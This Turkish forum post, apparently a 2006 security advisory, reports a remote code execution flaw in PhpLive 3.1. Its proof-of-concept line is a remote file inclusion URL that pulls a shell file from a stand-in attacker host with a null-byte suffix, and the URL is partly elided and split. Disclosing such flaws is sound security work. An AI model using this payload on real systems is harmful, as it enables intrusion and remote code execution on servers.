PhpLive 3.1 Güvenlik Açığı - Yeni

Onur OKTAY
08-10-2006, 21:17   |  #1  
OP Yıllanmış Üye
Teşekkür Sayısı: 0
169 mesaj
Kayıt Tarihi:Kayıt: Şub 2006

Risk : yüksek

Etki : Uzaktan kod caliştirma, Exploit'lere izin verme.

Etkilenenler : 3.1. sürümünü kullanan phpLive yazilimlari.

Bilgi : phpLive.3.1. sürümünde helpphp.remote klasöründe bulunan kod yanlışlıkları nedeniyle uzaktan ataklar düzenlenebiliyor.

Exploit ( atak kodlar ) :

Proof of Concept: http://victim.com/phplive/help.p ... w.attacker.com/shel
l.foo%00



l.foo?foo=


Security advisory by Onur OKTAY